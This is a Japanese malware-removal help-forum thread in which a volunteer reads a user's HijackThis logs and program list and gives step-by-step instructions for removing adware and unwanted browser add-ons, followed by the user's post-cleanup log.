KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
McAfee Security Scan Plus McAfee, Inc. 2014/12/27 10.2 MB 3.8.150.1
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 36.0.1 (x86 ja) Mozilla 2015/03/14 84.4 MB 36.0.1
Mozilla Maintenance Service Mozilla 2014/11/13 225 KB 29.0
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
Search Protect Client Connect LTD 2015/03/19 2.21.200.26
Skype Click to Call Microsoft Corporation 2014/12/30 10.1 MB 7.3.16540.9015
Skype(TM) 7.1 Skype Technologies S.A. 2015/03/14 48.5 MB 7.1.105
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Twitch Stream "" 2015/03/04
UnIDealsi 2014/02/25
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム･デバイス･マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
WinCheck WinCheck 2015/02/27 1.0.0.0
youtubeadblocker 2014/02/25
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす３学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないＲ Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000


以上です。
解決策を口授して頂きたい所存です。

ログを確認させていただきました。
申し訳ありませんがHJTの最上部のシステム要項部分のログが途切れております。
システム要項を確認しないと適切な処置ができませんため、
お手数ですが途切れている部分だけで結構ですのでご提示ください。

申し訳ありませんでした。
これでいかがでしょうか？

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:21:50, on 2015/03/21
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)

FIREFOX: 36.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\PROGRA~2\SEARCH~1\SearchProtect\bin\cltmng.exe
C:\PROGRA~2\SEARCH~1\UI\bin\cltmngui.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\ryota\Downloads\HijackThis (1).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12313 bytes

Windows 8.1、主要ブラウザはFirefoxですね。
ご提示ありがとうございます。
それでは作業準備を行いましょう。

まずはじめに連絡事項がございます。
相談いただいてから回答できるまでに、毎回1日かそれ以上かかる可能性もございます。
ご不便をおかけいたしますが、ご理解とご協力を賜りますよう、お願い申し上げます。
また、回答者側から「解決」と通達があるまで、駆除作業は続いております。
そのため、途中でPCの状況が良くなったかのように感じたからと言って、解決のご案内を待たずして作業を中断なされると、
高確率で再発しているのが現状で、再発時にこちらにお戻りになられる方が続出しております。
回答者から「解決」と「自衛策」の案内があるまでは、作業を続けるようにしてください。

それでは以下の説明を熟読し、順番に作業をお願いします。
既に準備した物もあるはずですが、一応説明を再度見ておいてください。

隠しファイルと拡張子を表示設定にしてください(やり方↓）
http://pasofaq.jp/windows/mycomputer/hiddenfile.htm
http://support.microsoft.com/kb/978449/ja

下記のツールをダウンロードして、基本の使い方を把握しておいてください。
ただし、配布サイトで他のソフトウェアをダウンロードしろと勧めてくるような広告も出てくる可能性がありますが、
それらは絶対にクリックしないでください。
「ATF-Cleaner」（通称:ATF）
説明↓
http://freesoft.tvbok.com/freesoft/pc_system/atf-cleaner.html
ダウンロード↓
http://www.atribune.org/index.php?option=com_content&task=view&id=25&Itemid=1
中央の赤い文字がダウンロードリンクです。
片付けるときはファイルを直接削除してください。
説明ページではWindowsXpと2000対応と書かれてますが、Win7やVistaにも対応です。

GeekUninstaller（通称:Geek）
ダウンロード
http://www.geekuninstaller.com/geek.zip
ファイル直リンクです。zipファイルですので使用前に展開してください。
削除の際はそのままごみ箱に処分してください。
解説
http://www.gigafree.net/system/install/geekuninstaller.html

「CCleaner」（通称:CC）
説明↓
http://www.gigafree.net/system/clean/ccleaner.html
http://note.chiebukuro.yahoo.co.jp/detail/n178757
ダウンロード↓
http://www.piriform.com/ccleaner/download/standard
最新バージョンをダウンロードするようにしましょう。
なお、インストール時におまけのアプリも勧めてくることがありますが、それらはチェック外してインストールは避けてください。
削除の際はGeekなどでアンインストールしてください。

ここで重要な注意です。
CCは本来は高い性能を持つメンテナンスソフトですが、間違った使い方すると
【操作次第ではWindowsが動作しなくなる可能性もある】
ので、ここでは解析ツールとしてのみ使います。
説明をしっかり読んで、こちらが指示した以外の操作はしないようにしてください。

準備できたら作業を開始しましょう。

以降の駆除作業でトラブルが発生しても直ちに復旧できるよう、システムの復元ポイントを手動で作成しましょう。
http://windows.microsoft.com/ja-jp/windows7/create-a-restore-point
しかし、システムの復元はPCにかなりのダメージを与えますので、できれば使わないほうが望ましいです。
システムの復元が必要のない、慎重な作業を心がけましょう。

PCをセーフモードで起動してください（やり方↓）
http://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=015917
HJTを起動させ、スキャンを行ってください。
スキャン結果が表示されましたら、以下の項目にチェックを入れてください。
ただし、特にHJTでの作業は一歩間違えれば簡単にPCが起動しなくなるため、
こちらが指示した以外のものは絶対にチェックを入れないでください。

O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - Global Startup: MCAFEE SECURITY SCAN Plus.lnk = C:\Program Files\MCAFEE SECURITY SCAN\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O11 - Options group: [!CNS] JWord(日本語キーワード)
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe

必要な項目すべてにチェックが入りましたら、Fix checkedをクリックしてください。
上記のFixが完了したら、Geek起動させ、以下を削除してください。

AAlllSaveer "" 2015/03/04
Craving Explorer Version 1.6.4 T-Craft 2014/08/06 26.6 MB 1.6.4.0
DiscounnTExeteensii "" 2015/03/04
Explzh for Windows (64bit) pon software 2014/11/13 7.1.7.0
ExstraSaviings "" 2015/03/06
FlvPlayer 2014/11/13 ${VERSION}
Freemake Audio Converter バージョン 1.1.0 Ellora Assets Corporation 2014/06/29 49.4 MB 1.1.0
Isaverr "" 2015/03/04
JWord(日本語キーワード) 2014/11/13
McAfee Security Scan Plus McAfee, Inc. 2014/12/27 10.2 MB 3.8.150.1
Search Protect Client Connect LTD 2015/03/19 2.21.200.26
Twitch Stream "" 2015/03/04
UnIDealsi 2014/02/25
WinCheck WinCheck 2015/02/27 1.0.0.0
youtubeadblocker 2014/02/25

ダブルクリックで削除できます。
削除が完了したら自動的にスキャンが始まりますので、検出されたごみすべてにチェックを入れてOKを押してください。
Geekでのアンインストールが完了しましたらGeekを終了させ、ATFで掃除を行ってください。
Select Allにチェックを入れ、Empty Selectedをクリックします。
ATFでの掃除が完了しましたらPCを通常モードで再起動させてください。
今一度HJTとCCのログを返信欄に貼り付けていただきご連絡をお願いいたします。

長い間お待たせしてしまい申し訳ありません。
作業に時間がかかり遅くなってしまいました。
以下に作業後のログを貼っておきますので次の指示をお願い致します。

HJT

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 17:29:04, on 2015/04/04
Platform: Unknown Windows (WinNT 6.03.1408)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Safe mode

Running processes:
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: TakeTHeCoupon - {6a6b254b-05d3-451a-9396-b7247e2e114e} - C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.dll
O2 - BHO: SaverExxtensiion - {6ec8ea13-7d70-415f-ab97-2aa8f4082c82} - C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.dll
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
